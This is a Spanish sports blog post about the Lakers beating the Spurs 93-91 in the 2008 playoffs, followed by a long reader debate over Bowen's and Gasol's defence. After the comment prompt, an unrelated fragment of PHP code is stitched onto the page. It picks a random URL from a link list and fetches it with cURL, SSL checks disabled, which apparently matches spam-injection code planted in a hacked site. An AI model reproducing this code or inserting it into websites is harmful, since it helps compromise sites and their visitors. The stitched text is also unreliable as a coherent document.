Un paso hacia la final (LAL 93 – SAS 91)

28 de May de 2008 por TheDeerHunter

Tras la paliza del otro día muchos en L.A. comenzaron a ver fantasmas… lógico, teniendo en cuenta quién se tiene en frente y los precedentes de esta misma postemporada. No se puede negar que el miedo comenzó a instalarse en la mente de muchos aficionados llegando casi a parecer que quien llevaba la ventaja eran los actuales campeones. En cambio, Kobe salía sonriente haciendo bromas sobre ciertos tiros de Ginobili el otro día, Phil Jackson tratando de mesurar de forma justa la derrota y Pau&Odom imitando al argentino haciendo un ejercicio de autocrítica y de motivación interesantes.

Unos y otros sabemos qué clase de rival es San Antonio. La última dinastía, el mejor equipo de la década, el mejor jugador de los últimos años y en su posición de la historia, la mejor defensa, el entrenador más feroz, los mejores secundarios, la mejor plantilla, la plaza más difícil. Entra dentro de lo perfectamente posible que ellos ganen cualquier partido y más si lo juegan en casa. ¿Estaban eliminados por llevar un 2-0 en contra? Ni de coña. ¿Lo tenían todo hecho si ganaban estos dos siguientes partidos? No lo creo ¿Tienen algo que hacer todavía en esta eliminatoria? Vosotros me diréis…

Los jugadores, sobre todo los de L.A. porque a los otros se les presupone, han mostrado ser perfectamente conscientes de todo esto y han logrado relativizarlo al máximo y transmitirlo además. Es un gran paso y una importante muestra de madurez en este equipo, que quizá pueda llevarles a la final… sólo quizá.

La mentalización se tradujo en un inicio arrollador y en un control emocional extraordinario a lo largo del partido para dosificar las mínimas ventajas que se iban obteniendo. Kobe exquisito, como siempre, aunque dosificado como durante toda la eliminatoria y, por poner algún pero, con bastante menos visión global de lo que ha venido mostrando. El resto aportando eficazmente con mucha calma, autocontrol, un ritmo pausado muy alejado de sus propias naturalezas. Defensa e intensidad (¿quién lo iba a decir?) llegando incluso a dominar en los tableros. Muchos cargarán contra el partido de anoche de Gasol. Sufrió lo máximo pero fue inteligentísimo, cuestión de puntos de vista. Y Odom por esta vez ganó la batalla a Odom y fue quien aportó más cabeza en el momento decisivo. Mucho se le debe de la situación privilegiada actual.

San Antonio hizo el partido que debían hacer pero le faltaron dos cosas. Una de ellas el factor Ginobili, con una serie que de caer finalmente derrotados será recordada históricamente por los problemas físicos del purasangre argentino. La otra y la más sorprendente, la templanza. Tantas veces como tuvieron a tiro a L.A. fallaron estrepitosamente. La presión y el cansancio hace mella hasta en los dioses del olimpo. Hay que destacar a Brent Barry ejerciendo de Ginobili, recuperado en el mejor momento para ellos y con ganas de dar, todavía, mucha guerra.

Algún día alguien me tendrá que explicar porqué si Ducan mete 29 con malos porcentajes de tiro y Kobe 28 con buenos, Bruce Bowen es el maestro legendario de las defensas y Gasol un flojo. Misterios insondables, al menos para mí. Nadie debe fiarse del resultado actual. Circunstancial como tantas y tantas conclusiones que se han sacado en estos lares. San Antonio es perfectamente capaz de ganar el siguiente partido y después el siguiente, y el siguiente. En todo caso, el panorama es bueno para Lakers… al menos hasta el próximo partido.

Comenta

11 comentarios a esta entrada

  1. telekoman dice:
    #1

    Soy optimista. Creo que con 2 partidos en casa y uno fuera, al menos uno de ellos caerá del lado Amarillo. Eso sí, más les vale que sea el primero. Principalmente para recuperar fuerzas y además para que a los fans del Purple&Gold no se hagan de repente devotos de la Virgen de la Cadena.

      Citar

  2. TheDeerHunter dice:
    #2

    Los Spurs acorralados son si cabe más peligrosos.
    En esta ocasión, sin embargo, a diferencia del caso de Nueva Orleans a quien se les ve más desgastados física y mentalmente es a ellos.

    Lakers debe de tratar de encauzar las emociones y la tensión extrema de su rival a su favor… tratando de llevar el partido mucho más a su terreno que el de anoche.
    Lo bueno es que ya han demostrado un par de veces que son capaces de batir a Spurs jugando a su propio juego. Seriedad e inteligencia como anoche, pero si puede ser un ritmo algo más alto que les favorezca más.

    Todavía queda sufrir mucho. (Maldito Gallis)

      Citar

  3. Viva_Dirk dice:
    #3

    Sobre tus misterios insondables, quizá me puedas explicar porque Kobe promedia en esta serie 6 puntos menos que en las 2 anteriores o porque está en 4 asistencias por las casi 7 que estaba dando, y de paso porque Duncan pasa de hacer 15-13 a 23-18. En ambos casos me parece acierto de los atacantes, pero no me trago la comparación de defensores.

    Por lo demas, ¡¡¡¡¡¡vaaaaaaaaaaaaamos!!!!!!!!

      Citar

  4. TheDeerHunter dice:
    #4

    No sé qué tipo de partidos has visto tú, pero yo la defensa que he visto de Bowen ha ido en únicamente dos direcciones. Inexistente o falta.
    En todas y cada una de las ocasiones que Kobe lo ha intentado ha hecho lo que le ha dado la gana. La sensación ha sido más de autoregularse él que de ser defendido. Si me lo preguntas a mí, te diría que el “bajón” que comentas es más por los rivales en sí (Denver, por ejemplo, que sube la media) y por los problemas físicos que arrastra (no lo olvidemos) que por la cuestionable defensa de Bowen.

    En cambio, Gasol, sí le he visto defender a ratos bastante bien a Duncan… jugador que por otro lado considero también indefendible. Las necesidades ahora mismo de su equipo también han mucho influido para un aumento, en mi opinión forzado (por el %) de sus aportaciones, además de que ese 15 “estadístico” que hábilmente mencionas (y tendenciosamente pillín) está muy marcado por un partido puntual con fiebre.
    No voy a decir ahora que Gasol es el puto crack de la defensa… pero el chaval se lo está currando y trata de estar lo más serio posible… además que por otro lado, el no tiene relevo para desparramar faltas como sí puede tener Bowen… aunque da igual, porque a él no se las pitan.

      Citar

  5. Viva_Dirk dice:
    #5

    Si yo no he dicho que no, pero no acudas a los números y a los porcentajes si luego vas a renegar de ellos. ´

    Quitando ese partido la media de Duncan frente a New Orleans no llega a 17, puedes darle las vueltas que quieras.

      Citar

  6. Viva_Dirk dice:
    #6

    Ah! Se me olvidaba, si en todas y cada una de las ocasiones en las que Kobe lo ha intentado ha hecho lo que le ha dado la gana, no se que demonios hacemos pasando apuros.

      Citar

  7. TheDeerHunter dice:
    #7

    La clave es… ¿puede Kobe más??
    Yo veo a todos (no sólo a Kobe) terriblemente fundidos. Para mí es evidente que está minimizando esfuerzos. No acapara tanto juego como algunos os gusta tanto echarle encara.
    En cualquier caso, otro matiz, ha hecho lo que le ha dado la gana y si ha fallado no ha sido porque Bowen le estuviera ahogando el tiro, precísamente.

    Yo no renuncio a los números. Digo que de Bowen se dice lo que se dice y de Gasol tb. Con los números en la mano (con todos, no con una parte sesgada) la diferencia no es esa ni de coña.
    Otros años podríamos discutirlo, pero este no entiendo porqué se le ha mantenido en el quinteto defensivo.

      Citar

  8. Viva_Dirk dice:
    #8

    Ey, que yo no lo comparto, creo que Bowen no es tan buen defensor.

    Sigo sin entender lo de que ha hecho la gana ‘y si ha fallado’, digo yo que no le habrá dado la gana fallar ¿no? Pero bueno es igual, yo no he criticado a Kobe y tu ya lo estás defendiendo.

      Citar

  9. TheDeerHunter dice:
    #9

    Me preguntas lo que quiero decir y yo te respondo. No he pretendido ir más allá.

    En la última me comentabas que no entiendes lo de “ha hecho lo que le da la gana” y “ha fallado”. Es muy sencillo, el cree que la va a meter, se levanta y falla porque está al límite de sus fuerzas, no porque tenga a Bowen mordiéndole el cogote.
    En cualquier caso, lo de “hacer lo que le da la gana”… no me refería a volar, ni a atravesar cuerpos rivales, ni a meterla del medio campo, ni nada por el estilo… era sólo una forma de hablar. Creía que me habíais entendido.

      Citar

  10. Viva_Dirk dice:
    #10

    Jeje, mas o menos te habia entendido, últimamente estoy mas susceptible con algunas cosas. La única aclaración que hago es que yo no habia criticado a Kobe.

      Citar

  11. Gallis dice:
    #11

    Pues vuelvo a estar con Deer (ya era hora, jeje). Creo que la defensa de Bowen está siendo mala. Lo que Kobe esta fallando lo falla únicamente porque no se puede acertar siempre, pero suelen ser tiros más o menos claros (al menos todo lo “claros” que los necesita Kobe), sin forzar en absoluto, para desespero de más de uno…es lógico que los números bajen, porque el ritmo del partido es mucho más bajo y porque las piernas cada vez pesan más…

    En cambio, igual que el tercer partido de Gasol me pareció desastroso, defensivamente hablando, ayer Pau me gustó mucho atrás. No fue espectacular, pero para lo que podemos esperar de Pau estuvo muy por encima. Duncan te va a coser sí o sí, pero si consigues que lo haga con malos porcentajes y acudiendo mucho a la línea de tiros libres, es un paso. Y en ese sentido chapeau también para Odom…

    Eso sí, Pau, no puedes fallar esos 2 tiros libres, por dios!!! uno tiene un pase, pero los 2…

    En fin, que lo suyo sería matar el partido el jueves y me mojo, creo que ganaremos medio fácil (entiendáseme que no creo que vayamos a ganar de 15 con 8 minutos de la basura). Si perdemos creo que iremos al séptimo…y sigo sin fiarme un pelo de esta gente…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>